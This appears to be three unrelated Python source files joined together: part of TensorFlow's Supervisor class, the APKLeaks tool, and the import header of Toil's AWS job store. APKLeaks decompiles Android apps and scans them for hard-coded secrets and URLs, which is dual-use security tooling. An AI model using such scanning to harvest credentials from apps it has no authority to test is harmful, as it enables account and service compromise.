default ones created automatically by the supervisor. If you want to run
your own summary and checkpointing logic, disable these services by passing
`None` to the `summary_op` and `saver` parameters.
Example: Create summaries manually every 100 steps in the chief.
```python
# Create a Supervisor with no automatic summaries.
sv = Supervisor(logdir='/tmp/mydir', is_chief=is_chief, summary_op=None)
# As summary_op was None, managed_session() does not start the
# summary thread.
with sv.managed_session(FLAGS.master) as sess:
for step in xrange(1000000):
if sv.should_stop():
break
if is_chief and step % 100 == 0:
# Create the summary every 100 chief steps.
sv.summary_computed(sess, sess.run(my_summary_op))
else:
# Train normally
sess.run(my_train_op)
```
##### Custom model initialization
`managed_session()` only supports initializing the model by running an
`init_op` or restoring from the latest checkpoint. If you have special
initialization needs, see how to specify a `local_init_op` when creating the
supervisor. You can also use the `SessionManager` directly to create a
session and check if it could be initialized automatically.
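Example: restore from a hand-picked checkpoint with a custom `init_fn`. (The
checkpoint path below is illustrative; the saver is created before the
Supervisor because the Supervisor finalizes the graph.)
```python
restore_saver = tf.train.Saver()
def restore_fn(sess):
  # Called once with the freshly created session, after the optional `init_op`.
  restore_saver.restore(sess, '/tmp/other_dir/model.ckpt-1000')
sv = Supervisor(logdir='/tmp/mydir', init_fn=restore_fn)
```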
@@__init__
@@managed_session
@@prepare_or_wait_for_session
@@start_standard_services
@@start_queue_runners
@@summary_computed
@@stop
@@request_stop
@@should_stop
@@stop_on_exception
@@wait_for_stop
"""
# Value to pass for the 'ready_op', 'init_op', 'summary_op', 'saver',
# and 'global_step' parameters of Supervisor.__init__() to indicate that
# the default behavior should be used.
USE_DEFAULT = 0
def __init__(self,
graph=None,
ready_op=USE_DEFAULT,
ready_for_local_init_op=USE_DEFAULT,
is_chief=True,
init_op=USE_DEFAULT,
init_feed_dict=None,
local_init_op=USE_DEFAULT,
logdir=None,
summary_op=USE_DEFAULT,
saver=USE_DEFAULT,
global_step=USE_DEFAULT,
save_summaries_secs=120,
save_model_secs=600,
recovery_wait_secs=30,
stop_grace_secs=120,
checkpoint_basename="model.ckpt",
session_manager=None,
summary_writer=USE_DEFAULT,
init_fn=None):
"""Create a `Supervisor`.
Args:
graph: A `Graph`. The graph that the model will use. Defaults to the
default `Graph`. The supervisor may add operations to the graph before
creating a session, but the graph should not be modified by the caller
after passing it to the supervisor.
ready_op: 1-D string `Tensor`. This tensor is evaluated by supervisors in
`prepare_or_wait_for_session()` to check if the model is ready to use.
The model is considered ready if it returns an empty array. Defaults to
the tensor returned from `tf.report_uninitialized_variables()`. If
`None`, the model is not checked for readiness.
ready_for_local_init_op: 1-D string `Tensor`. This tensor is evaluated by
supervisors in `prepare_or_wait_for_session()` to check if the model is
ready to run the local_init_op.
The model is considered ready if it returns an empty array. Defaults to
the tensor returned from
`tf.report_uninitialized_variables(tf.global_variables())`. If `None`,
the model is not checked for readiness before running local_init_op.
is_chief: If True, create a chief supervisor in charge of initializing
and restoring the model. If False, create a supervisor that relies
on a chief supervisor for inits and restore.
init_op: `Operation`. Used by chief supervisors to initialize the model
when it can not be recovered. Defaults to an `Operation` that
initializes all variables. If `None`, no initialization is done
automatically unless you pass a value for `init_fn`, see below.
init_feed_dict: A dictionary that maps `Tensor` objects to feed values.
This feed dictionary will be used when `init_op` is evaluated.
local_init_op: `Operation`. Used by all supervisors to run initializations
that should run for every new supervisor instance. By default these
are table initializers and initializers for local variables.
If `None`, no further per supervisor-instance initialization is
done automatically.
logdir: A string. Optional path to a directory where to checkpoint the
model and log events for the visualizer. Used by chief supervisors.
The directory will be created if it does not exist.
summary_op: An `Operation` that returns a Summary for the event logs.
Used by chief supervisors if a `logdir` was specified. Defaults to the
operation returned from summary.merge_all(). If `None`, summaries are
not computed automatically.
saver: A Saver object. Used by chief supervisors if a `logdir` was
specified. Defaults to the saver returned by Saver().
If `None`, the model is not saved automatically.
global_step: An integer Tensor of size 1 that counts steps. The value
from 'global_step' is used in summaries and checkpoint filenames.
Defaults to the op named 'global_step' in the graph if it exists, is of
rank 1, size 1, and of type tf.int32 or tf.int64. If `None` the global
step is not recorded in summaries and checkpoint files. Used by chief
supervisors if a `logdir` was specified.
save_summaries_secs: Number of seconds between the computation of
summaries for the event log. Defaults to 120 seconds. Pass 0 to
disable summaries.
save_model_secs: Number of seconds between the creation of model
checkpoints. Defaults to 600 seconds. Pass 0 to disable checkpoints.
recovery_wait_secs: Number of seconds between checks that the model
is ready. Used by supervisors when waiting for a chief supervisor
to initialize or restore the model. Defaults to 30 seconds.
stop_grace_secs: Grace period, in seconds, given to running threads to
stop when `stop()` is called. Defaults to 120 seconds.
checkpoint_basename: The basename for checkpoint saving.
session_manager: `SessionManager`, which manages Session creation and
recovery. If it is `None`, a default `SessionManager` will be created
with the set of arguments passed in for backwards compatibility.
summary_writer: `SummaryWriter` to use or `USE_DEFAULT`. Can be `None`
to indicate that no summaries should be written.
init_fn: Optional callable used to initialize the model. Called
after the optional `init_op` is called. The callable must accept one
argument, the session being initialized.
Returns:
A `Supervisor`.
"""
# Set default values of arguments.
if graph is None:
graph = ops.get_default_graph()
with graph.as_default():
self._init_ready_op(
ready_op=ready_op, ready_for_local_init_op=ready_for_local_init_op)
self._init_init_op(init_op=init_op, init_feed_dict=init_feed_dict)
self._init_local_init_op(local_init_op=local_init_op)
self._init_saver(saver=saver)
self._init_summary_op(summary_op=summary_op)
self._init_global_step(global_step=global_step)
self._graph = graph
self._meta_graph_def = meta_graph.create_meta_graph_def(
graph_def=graph.as_graph_def(add_shapes=True),
saver_def=self._saver.saver_def if self._saver else None)
self._is_chief = is_chief
self._coord = coordinator.Coordinator()
self._recovery_wait_secs = recovery_wait_secs
self._stop_grace_secs = stop_grace_secs
self._init_fn = init_fn
# Set all attributes related to checkpointing and writing events to None.
# Afterwards, set them appropriately for chief supervisors, as these are
# the only supervisors that can write checkpoints and events.
self._logdir = None
self._save_summaries_secs = None
self._save_model_secs = None
self._save_path = None
self._summary_writer = None
if self._is_chief:
self._logdir = logdir
self._save_summaries_secs = save_summaries_secs
self._save_model_secs = save_model_secs
if self._logdir:
self._save_path = os.path.join(self._logdir, checkpoint_basename)
if summary_writer is Supervisor.USE_DEFAULT:
if self._logdir:
self._summary_writer = _summary.FileWriter(self._logdir)
else:
self._summary_writer = summary_writer
self._graph_added_to_summary = False
self._init_session_manager(session_manager=session_manager)
self._verify_setup()
# The graph is not allowed to change anymore.
graph.finalize()
def _init_session_manager(self, session_manager=None):
if session_manager is None:
self._session_manager = session_manager_mod.SessionManager(
local_init_op=self._local_init_op,
ready_op=self._ready_op,
ready_for_local_init_op=self._ready_for_local_init_op,
graph=self._graph,
recovery_wait_secs=self._recovery_wait_secs)
else:
self._session_manager = session_manager
def _get_first_op_from_collection(self, key):
"""Returns the first `Operation` from a collection.
Args:
key: A string collection key.
Returns:
The first Op found in a collection, or `None` if the collection is empty.
"""
try:
op_list = ops.get_collection(key)
if len(op_list) > 1:
logging.info("Found %d %s operations. Returning the first one.",
len(op_list), key)
if op_list:
return op_list[0]
except LookupError:
pass
return None
def _init_ready_op(self,
ready_op=USE_DEFAULT,
ready_for_local_init_op=USE_DEFAULT):
"""Initializes ready_op.
Args:
ready_op: `Tensor` to check if the model is initialized.
If it's set to USE_DEFAULT, creates an op that checks all
the variables are initialized.
ready_for_local_init_op: `Tensor` to check if the model is ready to run
local_init_op.
If it's set to USE_DEFAULT, creates an op that checks all
the global variables are initialized.
"""
if ready_op is Supervisor.USE_DEFAULT:
ready_op = self._get_first_op_from_collection(ops.GraphKeys.READY_OP)
if ready_op is None:
ready_op = variables.report_uninitialized_variables()
ops.add_to_collection(ops.GraphKeys.READY_OP, ready_op)
self._ready_op = ready_op
# ready_for_local_init_op defaults to None for backward compatibility
if ready_for_local_init_op is Supervisor.USE_DEFAULT:
ready_for_local_init_op = self._get_first_op_from_collection(
ops.GraphKeys.READY_FOR_LOCAL_INIT_OP)
self._ready_for_local_init_op = ready_for_local_init_op
def _init_init_op(self, init_op=USE_DEFAULT, init_feed_dict=None):
"""Initializes init_op.
Args:
init_op: `Operation` to initialize the variables. If set to USE_DEFAULT,
create an op that initializes all variables and tables.
init_feed_dict: A dictionary that maps `Tensor` objects to feed values.
This feed dictionary will be used when `init_op` is evaluated.
"""
if init_op is Supervisor.USE_DEFAULT:
init_op = self._get_first_op_from_collection(ops.GraphKeys.INIT_OP)
if init_op is None:
init_op = variables.global_variables_initializer()
ops.add_to_collection(ops.GraphKeys.INIT_OP, init_op)
self._init_op = init_op
self._init_feed_dict = init_feed_dict
def _init_local_init_op(self, local_init_op=USE_DEFAULT):
"""Initializes local_init_op.
Args:
local_init_op: `Operation` run for every new supervisor instance. If set
to USE_DEFAULT, use the first op from the GraphKeys.LOCAL_INIT_OP
collection. If the collection is empty, create an op that initializes
all local variables and all tables.
"""
if local_init_op is Supervisor.USE_DEFAULT:
local_init_op = self._get_first_op_from_collection(
ops.GraphKeys.LOCAL_INIT_OP)
if local_init_op is None:
op_list = [variables.local_variables_initializer(),
data_flow_ops.tables_initializer()]
if op_list:
local_init_op = control_flow_ops.group(*op_list)
ops.add_to_collection(ops.GraphKeys.LOCAL_INIT_OP, local_init_op)
self._local_init_op = local_init_op
def _init_saver(self, saver=USE_DEFAULT):
"""Initializes saver.
Args:
saver: A `Saver` object. If set to USE_DEFAULT, create one that
saves all the variables.
"""
if saver is Supervisor.USE_DEFAULT:
saver = self._get_first_op_from_collection(ops.GraphKeys.SAVERS)
if saver is None and variables.global_variables():
saver = saver_mod.Saver()
ops.add_to_collection(ops.GraphKeys.SAVERS, saver)
self._saver = saver
def _init_summary_op(self, summary_op=USE_DEFAULT):
"""Initializes summary_op.
Args:
summary_op: An Operation that returns a Summary for the event logs.
If set to USE_DEFAULT, create an op that merges all the summaries.
"""
if summary_op is Supervisor.USE_DEFAULT:
summary_op = self._get_first_op_from_collection(ops.GraphKeys.SUMMARY_OP)
if summary_op is None:
summary_op = _summary.merge_all()
if summary_op is not None:
ops.add_to_collection(ops.GraphKeys.SUMMARY_OP, summary_op)
self._summary_op = summary_op
def _init_global_step(self, global_step=USE_DEFAULT):
"""Initializes global_step.
Args:
global_step: An integer Tensor of size 1 that counts steps. If
set to USE_DEFAULT, creates global_step tensor.
"""
if global_step is Supervisor.USE_DEFAULT:
global_step = self._get_first_op_from_collection(
ops.GraphKeys.GLOBAL_STEP)
if global_step is None:
global_step = self._default_global_step_tensor()
if global_step is not None:
ops.add_to_collection(ops.GraphKeys.GLOBAL_STEP, global_step)
self._global_step = global_step
@property
def is_chief(self):
"""Return True if this is a chief supervisor.
Returns:
A bool.
"""
return self._is_chief
@property
def session_manager(self):
"""Return the SessionManager used by the Supervisor.
Returns:
A SessionManager object.
"""
return self._session_manager
@property
def coord(self):
"""Return the Coordinator used by the Supervisor.
The Coordinator can be useful if you want to run multiple threads
during your training.
Returns:
A Coordinator object.
"""
return self._coord
@property
def init_op(self):
"""Return the Init Op used by the supervisor.
Returns:
An Op or `None`.
"""
return self._init_op
@property
def init_feed_dict(self):
"""Return the feed dictionary used when evaluating the `init_op`.
Returns:
A feed dictionary or `None`.
"""
return self._init_feed_dict
@property
def ready_op(self):
"""Return the Ready Op used by the supervisor.
Returns:
An Op or `None`.
"""
return self._ready_op
@property
def ready_for_local_init_op(self):
return self._ready_for_local_init_op
@property
def summary_writer(self):
"""Return the SummaryWriter used by the chief supervisor.
Returns:
A SummaryWriter.
"""
return self._summary_writer
@property
def summary_op(self):
"""Return the Summary Tensor used by the chief supervisor.
Returns:
A string Tensor for the summary or `None`.
"""
return self._summary_op
@property
def save_summaries_secs(self):
"""Return the delay between summary computations.
Returns:
A timestamp.
"""
return self._save_summaries_secs
@property
def global_step(self):
"""Return the global_step Tensor used by the supervisor.
Returns:
An integer Tensor for the global_step.
"""
return self._global_step
@property
def saver(self):
"""Return the Saver used by the supervisor.
Returns:
A Saver object.
"""
return self._saver
@property
def save_model_secs(self):
"""Return the delay between checkpoints.
Returns:
A timestamp.
"""
return self._save_model_secs
@property
def save_path(self):
"""Return the save path used by the supervisor.
Returns:
A string.
"""
return self._save_path
def _write_graph(self):
"""Writes graph_def to `logdir` and adds it to summary if applicable."""
assert self._is_chief
if self._logdir:
training_util.write_graph(self._graph.as_graph_def(add_shapes=True),
self._logdir, "graph.pbtxt")
if self._summary_writer and not self._graph_added_to_summary:
self._summary_writer.add_graph(self._graph)
self._summary_writer.add_meta_graph(self._meta_graph_def)
self._graph_added_to_summary = True
def start_standard_services(self, sess):
"""Start the standard services for 'sess'.
This starts services in the background. The services started depend
on the parameters to the constructor and may include:
- A Summary thread computing summaries every save_summaries_secs.
- A Checkpoint thread saving the model every save_model_secs.
- A StepCounter thread to measure step time.
Args:
sess: A Session.
Returns:
A list of threads that are running the standard services. You can use
the Supervisor's Coordinator to join these threads with:
sv.coord.Join(<list of threads>)
Raises:
RuntimeError: If called with a non-chief Supervisor.
ValueError: If no `logdir` was passed to the constructor, as the
services need a log directory.
"""
if not self._is_chief:
raise RuntimeError("Only chief supervisor can start standard services. "
"Because only chief supervisors can write events.")
if not self._logdir:
logging.warning("Standard services need a 'logdir' "
"passed to the SessionManager")
return
if self._global_step is not None and self._summary_writer:
# Only add the session log if we keep track of global step.
# TensorBoard cannot use START message for purging expired events
# if there is no step value.
current_step = training_util.global_step(sess, self._global_step)
self._summary_writer.add_session_log(
SessionLog(status=SessionLog.START),
current_step)
threads = []
if self._save_summaries_secs and self._summary_writer:
if self._summary_op is not None:
threads.append(SVSummaryThread(self, sess))
if self._global_step is not None:
threads.append(SVStepCounterThread(self, sess))
if self.saver and self._save_model_secs:
threads.append(SVTimerCheckpointThread(self, sess))
for t in threads:
t.start()
return threads
def prepare_or_wait_for_session(self, master="", config=None,
wait_for_checkpoint=False,
max_wait_secs=7200,
start_standard_services=True):
"""Make sure the model is ready to be used.
Create a session on 'master', recovering or initializing the model as
needed, or wait for a session to be ready. If running as the chief
and `start_standard_services` is set to True, also call the session
manager to start the standard services.
Args:
master: name of the TensorFlow master to use. See the `tf.Session`
constructor for how this is interpreted.
config: Optional ConfigProto proto used to configure the session,
which is passed as-is to create the session.
wait_for_checkpoint: Whether we should wait for the availability of a
checkpoint before creating Session. Defaults to False.
max_wait_secs: Maximum time to wait for the session to become available.
start_standard_services: Whether to start the standard services and the
queue runners.
Returns:
A Session object that can be used to drive the model.
"""
# For users who recreate the session with prepare_or_wait_for_session(), we
# need to clear the coordinator's stop_event so that threads managed by the
# coordinator can run.
self._coord.clear_stop()
if self._summary_writer:
self._summary_writer.reopen()
if self._is_chief:
sess = self._session_manager.prepare_session(
master, init_op=self.init_op, saver=self.saver,
checkpoint_dir=self._logdir, wait_for_checkpoint=wait_for_checkpoint,
max_wait_secs=max_wait_secs, config=config,
init_feed_dict=self._init_feed_dict, init_fn=self._init_fn)
self._write_graph()
if start_standard_services:
self.start_standard_services(sess)
else:
sess = self._session_manager.wait_for_session(master,
config=config,
max_wait_secs=max_wait_secs)
if start_standard_services:
self.start_queue_runners(sess)
return sess
def start_queue_runners(self, sess, queue_runners=None):
"""Start threads for `QueueRunners`.
Note that the queue runners collected in the graph key `QUEUE_RUNNERS`
are already started automatically when you create a session with the
supervisor, so unless you have non-collected queue runners to start
you do not need to call this explicitly.
Args:
sess: A `Session`.
queue_runners: A list of `QueueRunners`. If not specified, we'll use the
list of queue runners gathered in the graph under the key
`GraphKeys.QUEUE_RUNNERS`.
Returns:
The list of threads started for the `QueueRunners`.
"""
if queue_runners is None:
queue_runners = self._graph.get_collection(ops.GraphKeys.QUEUE_RUNNERS)
threads = []
for qr in queue_runners:
threads.extend(qr.create_threads(sess, coord=self._coord, daemon=True,
start=True))
return threads
def loop(self, timer_interval_secs, target, args=None, kwargs=None):
"""Start a LooperThread that calls a function periodically.
If `timer_interval_secs` is None the thread calls `target(*args, **kwargs)`
repeatedly. Otherwise it calls it every `timer_interval_secs`
seconds. The thread terminates when a stop is requested.
The started thread is added to the list of threads managed by the supervisor
so it does not need to be passed to the `stop()` method.
Args:
timer_interval_secs: Number. Time boundaries at which to call `target`.
target: A callable object.
args: Optional arguments to pass to `target` when calling it.
kwargs: Optional keyword arguments to pass to `target` when calling it.
Returns:
The started thread.
"""
looper = coordinator.LooperThread(self._coord, timer_interval_secs,
target=target, args=args, kwargs=kwargs)
looper.start()
return looper
def stop(self, threads=None, close_summary_writer=True):
"""Stop the services and the coordinator.
This does not close the session.
Args:
threads: Optional list of threads to join with the coordinator. If
`None`, defaults to the threads running the standard services, the
threads started for `QueueRunners`, and the threads started by the
`loop()` method. To wait on additional threads, pass the
list in this parameter.
close_summary_writer: Whether to close the `summary_writer`. Defaults to
`True` if the summary writer was created by the supervisor, `False`
otherwise.
"""
self._coord.request_stop()
try:
# coord.join() re-raises the first reported exception; the "finally"
# block ensures that we clean up whether or not an exception was
# reported.
self._coord.join(threads,
stop_grace_period_secs=self._stop_grace_secs)
finally:
# Close the writer last, in case one of the running threads was using it.
if close_summary_writer and self._summary_writer:
# Stop messages are not logged with event.step,
# since the session may have already terminated.
self._summary_writer.add_session_log(SessionLog(status=SessionLog.STOP))
self._summary_writer.close()
self._graph_added_to_summary = False
def request_stop(self, ex=None):
"""Request that the coordinator stop the threads.
See `Coordinator.request_stop()`.
Args:
ex: Optional `Exception`, or Python `exc_info` tuple as returned by
`sys.exc_info()`. If this is the first call to `request_stop()` the
corresponding exception is recorded and re-raised from `join()`.
"""
self._coord.request_stop(ex=ex)
def should_stop(self):
"""Check if the coordinator was told to stop.
See `Coordinator.should_stop()`.
Returns:
True if the coordinator was told to stop, False otherwise.
"""
return self._coord.should_stop()
def stop_on_exception(self):
"""Context handler to stop the supervisor when an exception is raised.
See `Coordinator.stop_on_exception()`.
Returns:
A context handler.
"""
return self._coord.stop_on_exception()
def wait_for_stop(self):
"""Block waiting for the coordinator to stop."""
self._coord.wait_for_stop()
def summary_computed(self, sess, summary, global_step=None):
"""Indicate that a summary was computed.
Args:
sess: A `Session` object.
summary: A Summary proto, or a string holding a serialized summary proto.
global_step: Int. global step this summary is associated with. If `None`,
it will try to fetch the current step.
Raises:
TypeError: if 'summary' is not a Summary proto or a string.
RuntimeError: if the Supervisor was created without a `logdir`.
"""
if not self._summary_writer:
raise RuntimeError("Writing a summary requires a summary writer.")
if global_step is None and self.global_step is not None:
global_step = training_util.global_step(sess, self.global_step)
self._summary_writer.add_summary(summary, global_step)
def _default_global_step_tensor(self):
"""Returns the global_step from the default graph.
Returns:
The global step `Tensor` or `None`.
"""
try:
gs = ops.get_default_graph().get_tensor_by_name("global_step:0")
if gs.dtype.base_dtype in [dtypes.int32, dtypes.int64]:
return gs
else:
logging.warning("Found 'global_step' is not an int type: %s", gs.dtype)
return None
except KeyError:
return None
def _verify_setup(self):
"""Check that all is good.
Raises:
ValueError: If something is not good.
"""
# Not running as chief means that replicas are used.
# In that case all Variables must have their device set.
if not self._is_chief:
for op in self._graph.get_operations():
if op.type in ["Variable", "VariableV2"] and not op.device:
raise ValueError("When using replicas, all Variables must have "
"their device set: %s" % op)
# pylint: disable=g-doc-return-or-yield,broad-except
@contextlib.contextmanager
def managed_session(self, master="", config=None,
start_standard_services=True,
close_summary_writer=True):
"""Returns a context manager for a managed session.
This context manager creates and automatically recovers a session. It
optionally starts the standard services that handle checkpoints and
summaries. It monitors exceptions raised from the `with` block or from the
services and stops the supervisor as needed.
The context manager is typically used as follows:
```python
def train():
sv = tf.train.Supervisor(...)
with sv.managed_session(<master>) as sess:
for step in xrange(..):
if sv.should_stop():
break
sess.run(<my training op>)
...do other things needed at each training step...
```
An exception raised from the `with` block or one of the service threads is
raised again when the block exits. This is done after stopping all threads
and closing the session. For example, an `AbortedError` exception, raised
in case of preemption of one of the workers in a distributed model, is
raised again when the block exits.
If you want to retry the training loop in case of preemption you can do it
as follows:
```python
def main(...):
while True:
try:
train()
except tf.errors.Aborted:
pass
```
As a special case, exceptions used for control flow, such as
`OutOfRangeError` which reports that input queues are exhausted, are not
raised again from the `with` block: they indicate a clean termination of
the training loop and are considered normal termination.
Args:
master: name of the TensorFlow master to use. See the `tf.Session`
constructor for how this is interpreted.
config: Optional `ConfigProto` proto used to configure the session.
Passed as-is to create the session.
start_standard_services: Whether to start the standard services,
such as checkpoint, summary and step counter.
close_summary_writer: Whether to close the summary writer when
closing the session. Defaults to True.
Returns:
A context manager that yields a `Session` restored from the latest
checkpoint or initialized from scratch if no checkpoint exists. The
session is closed when the `with` block exits.
"""
try:
sess = self.prepare_or_wait_for_session(
master=master, config=config,
start_standard_services=start_standard_services)
yield sess
except Exception as e:
self.request_stop(e)
finally:
try:
# Request all the threads to stop and wait for them to do so. Any
# exception raised by the threads is raised again from stop().
# Passing stop_grace_period_secs is for blocked enqueue/dequeue
# threads which are not checking for `should_stop()`. They
# will be stopped when we close the session further down.
self.stop(close_summary_writer=close_summary_writer)
finally:
# Close the session to finish up all pending calls. We do not care
# about exceptions raised when closing. This takes care of
# blocked enqueue/dequeue calls.
try:
sess.close()
except Exception:
# Silently ignore exceptions raised by close().
pass
# pylint: enable=g-doc-return-or-yield,broad-except
class SVSummaryThread(coordinator.LooperThread):
"""A thread to save summaries on a timer."""
def __init__(self, sv, sess):
"""Create a SVSummaryThread.
Args:
sv: A `Supervisor`.
sess: A `Session`.
"""
super(SVSummaryThread, self).__init__(sv.coord, sv.save_summaries_secs)
self._sv = sv
self._sess = sess
def run_loop(self):
if self._sv.global_step is not None:
summary_strs, global_step = self._sess.run([self._sv.summary_op,
self._sv.global_step])
else:
summary_strs = self._sess.run(self._sv.summary_op)
global_step = None
if self._sv.summary_writer:
self._sv.summary_writer.add_summary(summary_strs, global_step)
class SVStepCounterThread(coordinator.LooperThread):
"""Threads to count steps and measure their duration."""
def __init__(self, sv, sess):
"""Create a `SVStepCounterThread`.
Args:
sv: A `Supervisor`.
sess: A `Session`.
"""
super(SVStepCounterThread, self).__init__(sv.coord, sv.save_summaries_secs)
self._sv = sv
self._sess = sess
self._last_time = 0.0
self._last_step = 0
self._summary_tag = "%s/sec" % self._sv.global_step.op.name
def start_loop(self):
self._last_time = time.time()
self._last_step = training_util.global_step(
self._sess, self._sv.global_step)
def run_loop(self):
# Count the steps.
current_step = training_util.global_step(self._sess, self._sv.global_step)
added_steps = current_step - self._last_step
self._last_step = current_step
# Measure the elapsed time.
current_time = time.time()
elapsed_time = current_time - self._last_time
self._last_time = current_time
# Reports the number of steps done per second
steps_per_sec = added_steps / elapsed_time
summary = Summary(value=[Summary.Value(tag=self._summary_tag,
simple_value=steps_per_sec)])
if self._sv.summary_writer:
self._sv.summary_writer.add_summary(summary, current_step)
logging.log_first_n(logging.INFO, "%s: %g", 10,
self._summary_tag, steps_per_sec)
class SVTimerCheckpointThread(coordinator.LooperThread):
"""A thread to checkpoint on a timer."""
def __init__(self, sv, sess):
"""Create a `SVTimerCheckpointThread`.
Args:
sv: A `Supervisor`.
sess: A `Session`.
"""
super(SVTimerCheckpointThread, self).__init__(sv.coord, sv.save_model_secs)
self._sv = sv
self._sess = sess
def run_loop(self):
self._sv.saver.save(self._sess, self._sv.save_path,
global_step=self._sv.global_step)
if self._sv.summary_writer and self._sv.global_step is not None:
current_step = training_util.global_step(self._sess, self._sv.global_step)
self._sv.summary_writer.add_session_log(
SessionLog(status=SessionLog.CHECKPOINT,
checkpoint_path=self._sv.save_path),
current_step)
# TODO(sherrym): All non-PEP8 compliant names will be deprecated shortly.
setattr(Supervisor, "PrepareSession", Supervisor.prepare_or_wait_for_session)
setattr(Supervisor, "StartQueueRunners", Supervisor.start_queue_runners)
setattr(Supervisor, "StartStandardServices", Supervisor.start_standard_services)
setattr(Supervisor, "Stop", Supervisor.stop)
setattr(Supervisor, "RequestStop", Supervisor.request_stop)
setattr(Supervisor, "Loop", Supervisor.loop)
setattr(Supervisor, "ShouldStop", Supervisor.should_stop)
setattr(Supervisor, "StopOnException", Supervisor.stop_on_exception)
setattr(Supervisor, "WaitForStop", Supervisor.wait_for_stop)
setattr(Supervisor, "SummaryComputed", Supervisor.summary_computed)
|
apkleaks.py
|
#!/usr/bin/env python3
import io
import json
import logging.config
import os
import re
import shutil
import sys
import tempfile
import threading
from contextlib import closing
from distutils.spawn import find_executable
from pathlib import Path
from pipes import quote
from urllib.request import urlopen
from zipfile import ZipFile
from pyaxmlparser import APK
from apkleaks.colors import color as col
from apkleaks.utils import util
class APKLeaks:
def __init__(self, args):
self.apk = None
self.file = os.path.realpath(args.file)
self.json = args.json
self.disarg = args.args
self.prefix = "apkleaks-"
self.tempdir = tempfile.mkdtemp(prefix=self.prefix)
self.main_dir = os.path.dirname(os.path.realpath(__file__))
self.output = tempfile.mkstemp(suffix=".%s" % ("json" if self.json else "txt"), prefix=self.prefix)[1] if args.output is None else args.output
self.fileout = open(self.output, "%s" % ("w" if self.json else "a"))
self.pattern = os.path.join(str(Path(self.main_dir).parent), "config", "regexes.json") if args.pattern is None else args.pattern
self.jadx = find_executable("jadx") if find_executable("jadx") is not None else os.path.join(str(Path(self.main_dir).parent), "jadx", "bin", "jadx%s" % (".bat" if os.name == "nt" else "")).replace("\\","/")
self.out_json = {}
self.scanned = False
logging.config.dictConfig({"version": 1, "disable_existing_loggers": True})
def apk_info(self):
return APK(self.file)
def dependencies(self):
exter = "https://github.com/skylot/jadx/releases/download/v1.2.0/jadx-1.2.0.zip"
try:
with closing(urlopen(exter)) as jadx:
with ZipFile(io.BytesIO(jadx.read())) as zfile:
zfile.extractall(os.path.join(str(Path(self.main_dir).parent), "jadx"))
os.chmod(self.jadx, 33268)
except Exception as error:
util.writeln(str(error), col.WARNING)
sys.exit()
def integrity(self):
if os.path.exists(self.jadx) is False:
util.writeln("Can't find jadx binary.", col.WARNING)
valid = {"yes": True, "y": True, "ye": True, "no": False, "n": False}
while True:
util.write("Do you want to download jadx? (Y/n) ", col.OKBLUE)
try:
choice = input().lower()
if choice == "":
choice = valid["y"]
break
elif choice in valid:
choice = valid[choice]
break
else:
util.writeln("\nPlease respond with 'yes' or 'no' (or 'y' or 'n').", col.WARNING)
except KeyboardInterrupt:
sys.exit(util.writeln("\n** Interrupted. Aborting.", col.FAIL))
if choice:
util.writeln("\n** Downloading jadx...\n", col.OKBLUE)
self.dependencies()
else:
sys.exit(util.writeln("\n** Aborted.", col.FAIL))
if os.path.isfile(self.file):
try:
self.apk = self.apk_info()
except Exception as error:
util.writeln(str(error), col.WARNING)
sys.exit()
else:
return self.apk
else:
sys.exit(util.writeln("It's not a valid file!", col.WARNING))
def decompile(self):
util.writeln("** Decompiling APK...", col.OKBLUE)
args = [self.jadx, self.file, "-d", self.tempdir]
try:
args.extend(re.split(r"\s|=", self.disarg))
except Exception:
pass
comm = "%s" % (" ".join(quote(arg) for arg in args))
comm = comm.replace("\'","\"")
os.system(comm)
def extract(self, name, matches):
if len(matches):
stdout = ("[%s]" % (name))
util.writeln("\n" + stdout, col.OKGREEN)
self.fileout.write("%s" % (stdout + "\n" if self.json is False else ""))
for secret in matches:
if name == "LinkFinder":
if re.match(r"^.(L[a-z]|application|audio|fonts|image|kotlin|layout|multipart|plain|text|video).*\/.+", secret) is not None:
continue
secret = secret[len("'"):-len("'")]
stdout = ("- %s" % (secret))
print(stdout)
self.fileout.write("%s" % (stdout + "\n" if self.json is False else ""))
self.fileout.write("%s" % ("\n" if self.json is False else ""))
self.out_json["results"].append({"name": name, "matches": matches})
self.scanned = True
def scanning(self):
if self.apk is None:
sys.exit(util.writeln("** Undefined package. Exit!", col.FAIL))
util.writeln("\n** Scanning against '%s'" % (self.apk.package), col.OKBLUE)
self.out_json["package"] = self.apk.package
self.out_json["results"] = []
with open(self.pattern) as regexes:
regex = json.load(regexes)
for name, pattern in regex.items():
if isinstance(pattern, list):
for p in pattern:
try:
thread = threading.Thread(target = self.extract, args = (name, util.finder(p, self.tempdir)))
thread.start()
except KeyboardInterrupt:
sys.exit(util.writeln("\n** Interrupted. Aborting...", col.FAIL))
else:
try:
thread = threading.Thread(target = self.extract, args = (name, util.finder(pattern, self.tempdir)))
thread.start()
except KeyboardInterrupt:
sys.exit(util.writeln("\n** Interrupted. Aborting...", col.FAIL))
def cleanup(self):
shutil.rmtree(self.tempdir)
if self.scanned:
self.fileout.write("%s" % (json.dumps(self.out_json, indent=4) if self.json else ""))
self.fileout.close()
print("%s\n** Results saved into '%s%s%s%s'%s." % (col.HEADER, col.ENDC, col.OKGREEN, self.output, col.HEADER, col.ENDC))
else:
self.fileout.close()
os.remove(self.output)
util.writeln("\n** Done with nothing. ¯\\_(ツ)_/¯", col.WARNING)
|
awsJobStore.py
|
# Copyright (C) 2015 UCSC Computational Genomics Lab
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from StringIO import StringIO
from contextlib import contextmanager
import logging
import os
import re
from threading import Thread
import uuid
import bz2
import cPickle
import base64
import hashlib
# noinspection PyUnresolvedReferences
from boto.sdb.domain import Domain
# noinspection PyUnresolvedReferences
from boto.s3.bucket import Bucket
# noinspection PyUnresolvedReferences
from boto.s3.connection import S3Connection
# noinspection PyUnresolvedReferences
from boto.sdb.connection import SDBConnection
from boto.sdb.item import Item
import boto.s3
import boto.sdb
from boto.exception import SDBResponseError, S3ResponseError, BotoServerError
import itertools
import time
from toil.jobStores.abstractJobStore import AbstractJobStore, NoSuchJobException, \
ConcurrentFileModificationException, NoSuchFileException
from toil.jobWrapper import JobWrapper
log = logging.getLogger(__name__)
